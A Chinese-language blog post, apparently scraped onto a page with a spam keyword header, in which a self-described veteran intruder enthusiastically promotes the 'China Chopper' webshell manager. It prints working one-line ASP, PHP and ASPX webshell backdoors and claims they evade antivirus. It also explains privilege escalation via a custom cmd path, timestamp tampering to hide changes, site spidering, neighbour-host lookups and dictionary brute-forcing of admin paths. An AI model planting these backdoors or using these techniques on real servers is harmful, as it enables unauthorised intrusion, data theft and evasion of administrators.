国外精品成品网站1688,迁安建设局官方网站,网站建设哪家专业,站酷网页设计分析来源#xff1a;http://edu2b.sinaapp.com/?p236replytocom17
作者#xff1a;XXX 我是一个玩黑很多年的人#xff0c;入侵了大大小小的服务器无数#xff0c;体验着入侵快感的同时#xff0c;自己的技术和经验也不断提高#xff0c;在渗透过程中收集了大大小小的…来源http://edu2b.sinaapp.com/?p236replytocom17
作者XXX 我是一个玩黑很多年的人入侵了大大小小的服务器无数体验着入侵快感的同时自己的技术和经验也不断提高在渗透过程中收集了大大小小的工具一堆都快把自己的U盘放满了当然随着时代和技术的进步很多工具也相应的过时了但是却很少去删掉看着那些熟悉的图标熟悉的界面就好象看到了自己一步步成长的过程这其中有很多是自己的作品看着那些逐渐从丑陋过渡到简陋再过渡到精美的软件界面呵呵这其中的滋味真的很感慨。 由于脚本是我自己的弱项于是这些年收集了很多脚本后门比如早期的站长管理助手海洋顶端系列砍客一句话后门虫虫催化剂后门还有angel的phpspy等等系列数不胜数当然还有后期的一堆美化版加强版超级加强版。算起来娇娘asp后门美化版是我所知的第一个流传较广的美化修改版后来逐渐被更新的海洋顶端网替代了渐渐淡出人们的视野以上种种asp,aspx,php,jsp,cfm,php,甚至wap协议通用的脚本后门箩箩筐筐收集了一大堆都快有10M大小了。这其中有一堆脚本是另一堆脚本的子集而不是交集还有不少是有后门的不过我也懒得去分辨和筛选了毕竟这些东东能让我用到的时候不多常用的还是那几个脚本比如ASP环境用这个PHP环境用那个,JSP环境用那个除非某些比较特别的功能是这个常用的脚本后门里面没有的我才去找那些不常用的脚本后门来临时代替一下这些弄起来很烦所以我一直在寻找着一款真正合心意的脚本后门终于……..我发现了一个远超我想象的脚本后门——-中国菜刀。 说起菜刀就不得不提起菜刀的作者作者是一个退伍军人生长在一个贫穷的农村据说初中也没读完英语更是不咋地但他却自学掌握了 C/J2ME/PHP/JSP/ASP.NET(C#,VB,C,delphi,J#)/ASP/MySQL/MsSQL/Oracle/Informix/PostgreSQL/DB2/Sybase/Access/UNIX/LINUX/WIN/SEO/Flash(AS)/PhotoShop/Freehand 等等当初在六七年前台湾闹独立的时候他在国民党和民进党的网站上留下了“只有一个中国”的黑页一举成名。 作者是一个朴实低调的技术牛人他这些年留下的作品很多中国菜刀是他最新的一个作品从他之前的作品WEBSHELL管理器的基础上修改而来功能更加的强大。 你见过很强大的ASP后门很强大的PHP后门很强大的ASPX后门那你见过很强大的asp,aspx,php三合一后门么……..没有吧尤其是这个后门只有一句话。 Asp环境%eval request(“a”)% Php环境?php eval($_POST[a]);? Aspx环境% page Language”Jscript”%eval(Request.item[a],”unsafe”);% 是不是很震憾很不可思议是的我刚接触的时候也是这样的想法就这三句话一个名不见经传的“中国菜刀”就可以代替我那搜集了几年大大小小几百个多种平台多种环境的脚本后门事实证明我错了原来“中国菜刀”不仅仅可以代替那些后门而且他的功能超出我的想象就让我慢慢说明吧。 1.就从最基本的讲起你的脚本是不是经常被杀你怎么变形都被杀传到服务器被杀导致被管理员发现结果你的权限就没了杀到你欲哭无泪。菜刀的一句话后门可以避免这个问题只有短短的一行代码永远不会被查杀。 2.你是不是很郁闷你的后门传到服务器上连他妈都不认识了框架变形字体变框框点击菜单无效这个是因为系统语言不兼容造成的菜刀是UINCODE方式编译,支持多国语言输入显示,完全不存在兼容性问题。 3.你是不是有很多webshell你每次都拿记事本记下来需要的时候又去翻半天弄得你很累很没脾气。有了“菜刀”你可以很方便管理你的webshell所有的记录都保存在加密的本地数据库里而且支持webshell分类让你管理得井井有条。菜刀不仅有临时锁定功能方便你离开电脑的那小会时间不被别人偷你的webshell也有加密功能不输对密码HOHO偷了你的数据也没用。 4.再来说说数据库管理这个是菜刀最最强大的功能精通各平台主流数据库的作者把这个功能写的是淋漓尽致。支持MYSQL,MSSQL,ORACLE,INFOMIX,ACCESS等等数据库支持不是最主要的功能强大人性化才是最主要的“菜刀”的数据库操作界面内置了常用的数据库语句非常直观的表列名浏览功能自动显示表名列名查询语句非常人性化的设计更内置了不少自建的函数方便不懂数据库的菜鸟都能查阅数据库里的数据再说个“菜刀”数据库管理的一个小技巧对于access数据库可以在菜刀的webshell操作界面对着MDB文件点右键点Access Management就直接进入Access的数据库操作界面了方便吧嘿嘿 5.再说说提权这块webshell的提权总是最让人关心的说到提权就不能说到webshell上的cmd执行了有些朋友并不了解菜刀的自定义CMD路径功能有两种方法可以设置指定的cmd路径一就是在cmd操作界面输入setp d:\cmd.exe就可以了或者把cmd.exe上传到目录然后点右键,点virtual terminal file就可以进入自定义CMD.EXE路径的命令行了同样的再给个cmd使用的小技巧在菜刀的命令行里可以使用cd等命令跳转目录方便吧嘿嘿嗯另外新版菜刀新增常用目录管理功能你可以把你常用的目录或者提权的目录加进菜刀里这样很方便你提权或者日常工作是不是比那些固定了提权目录的脚本后门要牛B的多啊哈哈。 6.还有菜刀的webshell上的文件功能功能也是非常人性化的文件夹和文件的图标完全模枋windows,文件日期文件大小文件权限一目了然尤其是修改文件时间功能非常的方便直接对着要修改时间的文件点右键,modify the file time然后在文件的时间那栏输入时间回车就修改完了。当然菜刀的文件管理还有新建删除上传下载编辑功能这些大同小异就不一一细说了。不过有个功能还是要重点说明的那就是目录缓存功能菜刀可以把浏览过的webshell目录都缓存在本地这样可以方便下次访问的时候更加快捷最重要的是当哪天你的权限丢了起码你还有对方服务器的文件目录结构方便再一次渗透。 说完大家都有的脚本后门功能现在来说点特别的菜刀功能非常特别跟实用的哦。菜刀的前身是WEBSHELL管理器再结合了作者之前的web管理软件等几个工具的优点实在是大杀器的集合体。 1蜘蛛爬行。我很喜欢用WVS对于WEB安全这块功能是非常的强大我很喜欢里面的一个功能目录爬行可以把WEB站的文件目录结构以很直观的形式排列出来很方便分析。我非常惊喜的发现菜刀居然也有这个功能叫蜘蛛爬行。 用法: {spider} {url:http://www.xunest.com/} 设定爬行范围 {spider} {url:http://www.xunest.com/} {range:xunest.com} 跟WVS的功能完全一样我上次上传webshell图片的时候不知道脚本后门给传到哪个目录结果用菜刀的蜘蛛爬行功能找出来了真是强大。 2旁注查询。在渗透的时候旁注是非常关键的不知有多少大站是死在他邻居的进攻下啊。你见过查询同服务器的所有域名那你见过查询同C段的所有域名不呵呵菜刀就可以做到 用法: 查单一IP的绑定域名 {reverse_ip} {url:http://www.xunest.com/} 扫描本C段开放的WEB服务器并查询绑定域名 {reverse_ip_c} {url:http://www.xunest.com/} 3:字典爆破功能。你是不是很喜欢webtool的目录扫描功能呢既然菜刀是集大成之所有者自然是不会少了这个功能的而且功能更加强大。 用法 {crack} {url:http://%s/admin/} {flag:HTTP/1.1 200} {dict:list.txt} {crack} {url:http://%s/admin/} {flag:!!HTTP/1.1 404} {dict:list.txt} {crack} {url:http://www.xunest.com/%s/} {flag:successfully} {dict:list.txt} %s为dict中的一行 flag:后面为返回的数据(含HTTP头部)中的特定关键字加!!为不包含关键字为TRUE否则包含关键字为TRUE, list.txt为当前目录下的文件可设为绝对路径注意不要包含太多的行。 这个目录爆破功能是非常灵活跟强大的首先可以根据返回的数据包自定义来判断目录是否存在然后可以爆破已知目录的上级目录举个例子假如你知道你的目录是guanli但是你是不知道guanli这个目录是在哪个目录里面那么你可以 {crack} {url:http://www.xunest.com/%s/guanli/} {flag:HTTP/1.1 200} {dict:list.txt} 其实呢菜刀还是一个浏览器。。。。。真的不骗你菜刀的浏览器功能非常简单却非常实用可以很方便的禁止或者开启网站的脚本、控件执行图片显示开关最最方便的还是cookies编辑功能了这个是非常重要的谁用谁知道。菜刀的浏览器是可以直接post提交的这个功能有什么用相信黑黑们也不用我多说了吧。另外一个就是自定义JS,这个据说也是很强大的但我暂时还没用到这个功能。 总结一下菜刀一直在完善一直在更新发展到现在已经不仅仅是一个webshell管理器可以说是一个大杀器的集合体就算完全抛弃里面的webshell管理功能菜刀也是一个很不错的浏览器很不错的后台扫描工具很不错的cookies编辑提交工具很不错的文件管理工具很不错的旁注软件不单是方便各位黑客朋友使用也很方便站长使用毕竟里面的文件管理功能上传下载比FTP更加直观了最重要的菜刀的数据库管理功能真的是前无古人后无来者非常非常方便严重推荐大家使用。 另附作者的下一步开发计划菜刀即将支持JSPCFM等等更加灵活也考虑开放菜刀的协议跟接口这样的话大家可以自由写插件也不局限于eval这样的一句话后门另外菜刀也将继续保持以人为本的人性化设计会更加灵活欢迎大家提意见。 中国菜刀的官方网站—http://www.maicaidao.com,上面有很详细的软件使用截图也可以下载到最新版的菜刀。 本文固定链接: http://edu2b.sinaapp.com/?p236 | yueyans Blog
